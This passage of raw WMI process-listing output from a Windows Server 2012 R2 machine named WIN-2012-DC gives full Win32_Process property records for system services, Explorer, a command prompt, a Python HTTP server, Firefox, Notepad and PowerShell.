C:\Windows\System32\vds.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1248" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="1248" Caption : svchost.exe CommandLine : C:\Windows\System32\svchost.exe -k termsvcs CreationClassName : Win32_Process CreationDate : 20170712121512.705767-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : svchost.exe ExecutablePath : C:\Windows\System32\svchost.exe ExecutionState : Handle : 1248 HandleCount : 401 InstallDate : KernelModeTime : 937500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 262 OtherTransferCount : 840 PageFaults : 4263 PageFileUsage : 3432 ParentProcessId : 440 PeakPageFileUsage : 3548 PeakVirtualSize : 76869632 PeakWorkingSetSize : 7380 Priority : 8 PrivatePageCount : 3514368 ProcessId : 1248 QuotaNonPagedPoolUsage : 19 QuotaPagedPoolUsage : 151 QuotaPeakNonPagedPoolUsage : 19 QuotaPeakPagedPoolUsage : 154 ReadOperationCount : 0 ReadTransferCount : 0 SessionId : 0 Status : TerminationDate : ThreadCount : 22 UserModeTime : 781250 VirtualSize : 75804672 WindowsVersion : 6.3.9600 WorkingSetSize : 2772992 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : svchost.exe Handles : 401 VM : 75804672 WS : 2772992 Path : C:\Windows\System32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1336" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="1336" Caption : svchost.exe CommandLine : C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted CreationClassName : Win32_Process CreationDate : 20170712121512.750613-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : svchost.exe ExecutablePath : C:\Windows\system32\svchost.exe ExecutionState : Handle : 1336 HandleCount : 107 InstallDate : KernelModeTime : 1406250 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 2288 OtherTransferCount : 122758 PageFaults : 2380 PageFileUsage : 1052 ParentProcessId : 440 PeakPageFileUsage : 1204 PeakVirtualSize : 22446080 PeakWorkingSetSize : 4368 Priority : 8 PrivatePageCount : 1077248 ProcessId : 1336 QuotaNonPagedPoolUsage : 11 QuotaPagedPoolUsage : 46 QuotaPeakNonPagedPoolUsage : 13 QuotaPeakPagedPoolUsage : 46 ReadOperationCount : 0 ReadTransferCount : 0 SessionId : 0 Status : TerminationDate : ThreadCount : 3 UserModeTime : 312500 VirtualSize : 21381120 WindowsVersion : 6.3.9600 WorkingSetSize : 1826816 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : svchost.exe Handles : 107 VM : 21381120 WS : 1826816 Path : C:\Windows\system32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="2060" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="2060" Caption : svchost.exe CommandLine : C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted CreationClassName : Win32_Process CreationDate : 20170712121512.780955-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : svchost.exe ExecutablePath : C:\Windows\system32\svchost.exe ExecutionState : Handle : 2060 HandleCount : 261 InstallDate : KernelModeTime : 625000 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 1670 OtherTransferCount : 37440 PageFaults : 6773 PageFileUsage : 7724 ParentProcessId : 440 PeakPageFileUsage : 11332 PeakVirtualSize : 1166675968 PeakWorkingSetSize : 12516 Priority : 8 PrivatePageCount : 7909376 ProcessId : 2060 QuotaNonPagedPoolUsage : 18 QuotaPagedPoolUsage : 126 QuotaPeakNonPagedPoolUsage : 19 QuotaPeakPagedPoolUsage : 127 ReadOperationCount : 389 ReadTransferCount : 12832768 SessionId : 0 Status : TerminationDate : ThreadCount : 8 UserModeTime : 0 VirtualSize : 628494336 WindowsVersion : 6.3.9600 WorkingSetSize : 3465216 WriteOperationCount : 360 WriteTransferCount : 2072576 PSComputerName : WIN-2012-DC ProcessName : svchost.exe Handles : 261 VM : 628494336 WS : 3465216 Path : C:\Windows\system32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="2600" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="2600" Caption : msdtc.exe CommandLine : C:\Windows\System32\msdtc.exe CreationClassName : Win32_Process CreationDate : 20170712121711.180176-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : msdtc.exe ExecutablePath : C:\Windows\System32\msdtc.exe ExecutionState : Handle : 2600 HandleCount : 158 InstallDate : KernelModeTime : 0 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : msdtc.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 158 OtherTransferCount : 274 PageFaults : 2084 PageFileUsage : 2312 ParentProcessId : 440 PeakPageFileUsage : 2480 PeakVirtualSize : 42795008 PeakWorkingSetSize : 6812 Priority : 8 PrivatePageCount : 2367488 ProcessId : 2600 QuotaNonPagedPoolUsage : 12 QuotaPagedPoolUsage : 74 QuotaPeakNonPagedPoolUsage : 13 QuotaPeakPagedPoolUsage : 74 ReadOperationCount : 0 ReadTransferCount : 0 SessionId : 0 Status : TerminationDate : ThreadCount : 9 UserModeTime : 0 VirtualSize : 41689088 WindowsVersion : 6.3.9600 WorkingSetSize : 413696 WriteOperationCount : 3 WriteTransferCount : 1286144 PSComputerName : WIN-2012-DC ProcessName : msdtc.exe Handles : 158 VM : 41689088 WS : 413696 Path : C:\Windows\System32\msdtc.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="260" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="260" Caption : taskhostex.exe CommandLine : taskhostex.exe CreationClassName : Win32_Process CreationDate : 20170712145926.030215-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : taskhostex.exe ExecutablePath : C:\Windows\system32\taskhostex.exe ExecutionState : Handle : 260 HandleCount : 195 InstallDate : KernelModeTime : 468750 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : taskhostex.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 787 OtherTransferCount : 10860 PageFaults : 2543 PageFileUsage : 2676 ParentProcessId : 868 PeakPageFileUsage : 3172 PeakVirtualSize : 232296448 PeakWorkingSetSize : 7604 Priority : 8 PrivatePageCount : 2740224 ProcessId : 260 QuotaNonPagedPoolUsage : 17 QuotaPagedPoolUsage : 168 QuotaPeakNonPagedPoolUsage : 21 QuotaPeakPagedPoolUsage : 170 ReadOperationCount : 27 ReadTransferCount : 1724416 SessionId : 1 Status : TerminationDate : ThreadCount : 5 UserModeTime : 156250 VirtualSize : 230174720 WindowsVersion : 6.3.9600 WorkingSetSize : 7614464 WriteOperationCount : 43 WriteTransferCount : 835584 PSComputerName : WIN-2012-DC ProcessName : taskhostex.exe Handles : 195 VM : 230174720 WS : 7614464 Path : C:\Windows\system32\taskhostex.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1188" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="1188" Caption : explorer.exe CommandLine : C:\Windows\Explorer.EXE CreationClassName : Win32_Process CreationDate : 20170712145926.061690-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : explorer.exe ExecutablePath : C:\Windows\Explorer.EXE ExecutionState : Handle : 1188 HandleCount : 1207 InstallDate : KernelModeTime : 167343750 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : explorer.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 38649 OtherTransferCount : 982340 PageFaults : 151042 PageFileUsage : 37648 ParentProcessId : 1860 PeakPageFileUsage : 48264 PeakVirtualSize : 588001280 PeakWorkingSetSize : 91248 Priority : 8 PrivatePageCount : 38551552 ProcessId : 1188 QuotaNonPagedPoolUsage : 67 QuotaPagedPoolUsage : 1049 QuotaPeakNonPagedPoolUsage : 95 QuotaPeakPagedPoolUsage : 1189 ReadOperationCount : 3022 ReadTransferCount : 3067227 SessionId : 1 Status : TerminationDate : ThreadCount : 43 UserModeTime : 78593750 VirtualSize : 509153280 WindowsVersion : 6.3.9600 WorkingSetSize : 75325440 WriteOperationCount : 151 WriteTransferCount : 25552 PSComputerName : WIN-2012-DC ProcessName : explorer.exe Handles : 1207 VM : 509153280 WS : 75325440 Path : C:\Windows\Explorer.EXE __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="3492" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="3492" Caption : VBoxTray.exe CommandLine : "C:\Windows\System32\VBoxTray.exe" CreationClassName : Win32_Process CreationDate : 20170712145937.014436-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : VBoxTray.exe ExecutablePath : C:\Windows\System32\VBoxTray.exe ExecutionState : Handle : 3492 HandleCount : 175 InstallDate : KernelModeTime : 156250 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : VBoxTray.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 29914 OtherTransferCount : 226456 PageFaults : 11696 PageFileUsage : 1792 ParentProcessId : 1188 PeakPageFileUsage : 1888 PeakVirtualSize : 89497600 PeakWorkingSetSize : 6284 Priority : 8 PrivatePageCount : 1835008 ProcessId : 3492 QuotaNonPagedPoolUsage : 12 QuotaPagedPoolUsage : 152 QuotaPeakNonPagedPoolUsage : 13 QuotaPeakPagedPoolUsage : 153 ReadOperationCount : 4590 ReadTransferCount : 36720 SessionId : 1 Status : TerminationDate : ThreadCount : 10 UserModeTime : 0 VirtualSize : 85270528 WindowsVersion : 6.3.9600 WorkingSetSize : 6385664 WriteOperationCount : 2295 WriteTransferCount : 9180 PSComputerName : WIN-2012-DC ProcessName : VBoxTray.exe Handles : 175 VM : 85270528 WS : 6385664 Path : C:\Windows\System32\VBoxTray.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="3944" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="3944" Caption : cmd.exe CommandLine : "C:\Windows\system32\cmd.exe" CreationClassName : Win32_Process CreationDate : 20170712151804.014863-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : cmd.exe ExecutablePath : C:\Windows\system32\cmd.exe ExecutionState : Handle : 3944 HandleCount : 31 InstallDate : KernelModeTime : 0 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : cmd.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 226 OtherTransferCount : 3268 PageFaults : 634 PageFileUsage : 1516 ParentProcessId : 1188 PeakPageFileUsage : 2612 PeakVirtualSize : 13705216 PeakWorkingSetSize : 2184 Priority : 8 PrivatePageCount : 1552384 ProcessId : 3944 QuotaNonPagedPoolUsage : 3 QuotaPagedPoolUsage : 24 QuotaPeakNonPagedPoolUsage : 4 QuotaPeakPagedPoolUsage : 25 ReadOperationCount : 0 ReadTransferCount : 0 SessionId : 1 Status : TerminationDate : ThreadCount : 1 UserModeTime : 0 VirtualSize : 12517376 WindowsVersion : 6.3.9600 WorkingSetSize : 2215936 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : cmd.exe Handles : 31 VM : 12517376 WS : 2215936 Path : C:\Windows\system32\cmd.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="3120" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="3120" Caption : conhost.exe CommandLine : \??\C:\Windows\system32\conhost.exe 0x4 CreationClassName : Win32_Process CreationDate : 20170712151804.031029-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : conhost.exe ExecutablePath : C:\Windows\system32\conhost.exe ExecutionState : Handle : 3120 HandleCount : 57 InstallDate : KernelModeTime : 312500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : conhost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 275 OtherTransferCount : 12923 PageFaults : 1915 PageFileUsage : 1012 ParentProcessId : 3944 PeakPageFileUsage : 1128 PeakVirtualSize : 62922752 PeakWorkingSetSize : 6096 Priority : 8 PrivatePageCount : 1036288 ProcessId : 3120 QuotaNonPagedPoolUsage : 7 QuotaPagedPoolUsage : 107 QuotaPeakNonPagedPoolUsage : 8 QuotaPeakPagedPoolUsage : 125 ReadOperationCount : 11 ReadTransferCount : 452 SessionId : 1 Status : TerminationDate : ThreadCount : 2 UserModeTime : 0 VirtualSize : 53530624 WindowsVersion : 6.3.9600 WorkingSetSize : 5320704 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : conhost.exe Handles : 57 VM : 53530624 WS : 5320704 Path : C:\Windows\system32\conhost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="3832" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="3832" Caption : python.exe CommandLine : python -m SimpleHTTPServer CreationClassName : Win32_Process CreationDate : 20170712151820.171032-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : python.exe ExecutablePath : C:\Python27\python.exe ExecutionState : Handle : 3832 HandleCount : 162 InstallDate : KernelModeTime : 468750 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : python.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 22459 OtherTransferCount : 434276 PageFaults : 2794 PageFileUsage : 5664 ParentProcessId : 3944 PeakPageFileUsage : 5816 PeakVirtualSize : 88002560 PeakWorkingSetSize : 10712 Priority : 8 PrivatePageCount : 5799936 ProcessId : 3832 QuotaNonPagedPoolUsage : 11 QuotaPagedPoolUsage : 146 QuotaPeakNonPagedPoolUsage : 157 QuotaPeakPagedPoolUsage : 146 ReadOperationCount : 240 ReadTransferCount : 1208439 SessionId : 1 Status : TerminationDate : ThreadCount : 1 UserModeTime : 937500 VirtualSize : 83390464 WindowsVersion : 6.3.9600 WorkingSetSize : 10915840 WriteOperationCount : 44 WriteTransferCount : 1051 PSComputerName : WIN-2012-DC ProcessName : python.exe Handles : 162 VM : 83390464 WS : 10915840 Path : C:\Python27\python.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="3116" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="3116" Caption : firefox.exe CommandLine : "C:\Program Files\Mozilla Firefox\firefox.exe" CreationClassName : Win32_Process CreationDate : 20170712152444.358480-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : firefox.exe ExecutablePath : C:\Program Files\Mozilla Firefox\firefox.exe ExecutionState : Handle : 3116 HandleCount : 749 InstallDate : KernelModeTime : 23750000 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : firefox.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 41297 OtherTransferCount : 712762 PageFaults : 1368464 PageFileUsage : 144784 ParentProcessId : 1188 PeakPageFileUsage : 180008 PeakVirtualSize : 1768960000 PeakWorkingSetSize : 221460 Priority : 8 PrivatePageCount : 148258816 ProcessId : 3116 QuotaNonPagedPoolUsage : 62 QuotaPagedPoolUsage : 607 QuotaPeakNonPagedPoolUsage : 87 QuotaPeakPagedPoolUsage : 731 ReadOperationCount : 5632 ReadTransferCount : 373181628 SessionId : 1 Status : TerminationDate : ThreadCount : 42 UserModeTime : 124531250 VirtualSize : 1683611648 WindowsVersion : 6.3.9600 WorkingSetSize : 200855552 WriteOperationCount : 632356 WriteTransferCount : 143084163 PSComputerName : WIN-2012-DC ProcessName : firefox.exe Handles : 749 VM : 1683611648 WS : 200855552 Path : C:\Program Files\Mozilla Firefox\firefox.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="2992" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="2992" Caption : firefox.exe CommandLine : "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.0.1418504536\2120526436" -childID 1 -isForBrowser -intPrefs 5:50|6:-1|28:1000|33:20|34:10|43:128| 44:10000|48:0|50:400|51:1|52:0|53:0|58:0|59:120|60:120|133:2|134:1|147:5000|157:0|159:0|170:10000|182:-1|187:128|188:10000|189:0|195:24|196:32768|198:0|199:0|207:5|211:10485 76|212:100|213:5000|215:600|217:1|226:1|231:0|241:60000| -boolPrefs 1:0|2:0|4:0|26:1|27:1|30:0|35:1|36:0|37:0|38:0|39:1|40:0|41:1|42:1|45:0|46:0|47:0|49:0|54:1|55:1|56:0|57: 1|61:1|62:1|63:0|64:1|65:1|66:0|67:1|70:0|71:0|74:1|75:1|79:1|80:1|81:0|82:0|84:0|85:0|86:1|87:0|90:0|91:1|92:1|93:1|94:1|95:1|96:0|97:0|98:1|99:0|100:0|101:0|102:1|103:1|10 4:0|105:1|106:1|107:0|108:0|109:1|110:1|111:1|112:0|113:1|114:1|115:1|116:1|117:1|118:1|119:1|120:1|122:0|123:0|124:0|125:1|126:0|127:1|131:1|132:1|135:1|136:0|141:0|146:0|1 49:1|152:1|154:1|158:0|161:1|164:1|165:1|171:0|172:0|173:1|175:0|181:0|183:1|184:0|185:0|186:0|193:0|194:0|197:1|200:0|202:0|204:1|205:0|210:0|214:1|219:0|220:0|221:0|222:1| 224:1|225:1|228:0|233:0|234:0|235:1|236:1|237:0|238:1|239:1|240:0|242:0|243:0|245:0|253:1|254:1|255:0|256:0|257:0| -stringPrefs "3:7;release|174:3;1.0|191:332; ¼½¾!???:????? %???????? ???????-’·?????????‹›?/???????????????/:?????????????????? ???????????????????./???????|192:8;moderate|227:38;{d130b7e4-5618-427c-891a-ee8a0888c2a8}|" -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" 3116 "\\.\pipe\gecko-crash-server-pipe.3116" tab CreationClassName : Win32_Process CreationDate : 20170712152446.155540-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : firefox.exe ExecutablePath : C:\Program Files\Mozilla Firefox\firefox.exe ExecutionState : Handle : 2992 HandleCount : 286 InstallDate : KernelModeTime : 2812500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : firefox.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 976 OtherTransferCount : 12866 PageFaults : 37633 PageFileUsage : 34096 ParentProcessId : 3116 PeakPageFileUsage : 44108 PeakVirtualSize : 1400070144 PeakWorkingSetSize : 82424 Priority : 8 PrivatePageCount : 34914304 ProcessId : 2992 QuotaNonPagedPoolUsage : 30 QuotaPagedPoolUsage : 454 QuotaPeakNonPagedPoolUsage : 32 QuotaPeakPagedPoolUsage : 474 ReadOperationCount : 3966 ReadTransferCount : 70438261 SessionId : 1 Status : TerminationDate : ThreadCount : 17 UserModeTime : 6875000 VirtualSize : 1378304000 WindowsVersion : 6.3.9600 WorkingSetSize : 72314880 WriteOperationCount : 2307 WriteTransferCount : 487820 PSComputerName : WIN-2012-DC ProcessName : firefox.exe Handles : 286 VM : 1378304000 WS : 72314880 Path : C:\Program Files\Mozilla Firefox\firefox.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="956" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="956" Caption : notepad.exe CommandLine : "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Administrator\Desktop\log.txt CreationClassName : Win32_Process CreationDate : 20170712153213.828260-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : notepad.exe ExecutablePath : C:\Windows\system32\NOTEPAD.EXE ExecutionState : Handle : 956 HandleCount : 95 InstallDate : KernelModeTime : 937500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : notepad.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 207 OtherTransferCount : 1744 PageFaults : 4672 PageFileUsage : 3024 ParentProcessId : 1188 PeakPageFileUsage : 4012 PeakVirtualSize : 151597056 PeakWorkingSetSize : 10756 Priority : 8 PrivatePageCount : 3096576 ProcessId : 956 QuotaNonPagedPoolUsage : 9 QuotaPagedPoolUsage : 278 QuotaPeakNonPagedPoolUsage : 10 QuotaPeakPagedPoolUsage : 289 ReadOperationCount : 1 ReadTransferCount : 60 SessionId : 1 Status : TerminationDate : ThreadCount : 1 UserModeTime : 625000 VirtualSize : 148074496 WindowsVersion : 6.3.9600 WorkingSetSize : 10457088 WriteOperationCount : 10 WriteTransferCount : 672390 PSComputerName : WIN-2012-DC ProcessName : notepad.exe Handles : 95 VM : 148074496 WS : 10457088 Path : C:\Windows\system32\NOTEPAD.EXE __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="3416" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="3416" Caption : powershell.exe CommandLine : "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CreationClassName : Win32_Process CreationDate : 20170712164403.172486-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : powershell.exe ExecutablePath : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ExecutionState : Handle : 3416 HandleCount : 448 InstallDate : KernelModeTime : 23281250 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : powershell.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 99601 OtherTransferCount : 6543278 PageFaults : 298573 PageFileUsage : 112212 ParentProcessId : 1188 PeakPageFileUsage : 114860 PeakVirtualSize : 659030016 PeakWorkingSetSize : 122112 Priority : 8 PrivatePageCount : 114905088 ProcessId : 3416 QuotaNonPagedPoolUsage : 35 QuotaPagedPoolUsage : 431 QuotaPeakNonPagedPoolUsage : 40 QuotaPeakPagedPoolUsage : 436 ReadOperationCount : 1024 ReadTransferCount : 3479940 SessionId : 1 Status : TerminationDate : ThreadCount : 10 UserModeTime : 164531250 VirtualSize : 657010688 WindowsVersion : 6.3.9600 WorkingSetSize : 122355712 WriteOperationCount : 3 WriteTransferCount : 5430 PSComputerName : WIN-2012-DC ProcessName : powershell.exe Handles : 448 VM : 657010688 WS : 122355712 Path : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="1928" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="1928" Caption : conhost.exe CommandLine : \??\C:\Windows\system32\conhost.exe 0x4 CreationClassName : Win32_Process CreationDate : 20170712164403.172486-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : conhost.exe ExecutablePath : C:\Windows\system32\conhost.exe ExecutionState : Handle : 1928 HandleCount : 58 InstallDate : KernelModeTime : 42812500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : conhost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 71097 OtherTransferCount : 4783207 PageFaults : 5369 PageFileUsage : 7316 ParentProcessId : 3416 PeakPageFileUsage : 11276 PeakVirtualSize : 88776704 PeakWorkingSetSize : 18428 Priority : 8 PrivatePageCount : 7491584 ProcessId : 1928 QuotaNonPagedPoolUsage : 7 QuotaPagedPoolUsage : 142 QuotaPeakNonPagedPoolUsage : 8 QuotaPeakPagedPoolUsage : 161 ReadOperationCount : 24 ReadTransferCount : 816 SessionId : 1 Status : TerminationDate : ThreadCount : 2 UserModeTime : 2812500 VirtualSize : 78757888 WindowsVersion : 6.3.9600 WorkingSetSize : 16302080 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : conhost.exe Handles : 58 VM : 78757888 WS : 16302080 Path : C:\Windows\system32\conhost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="840" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : 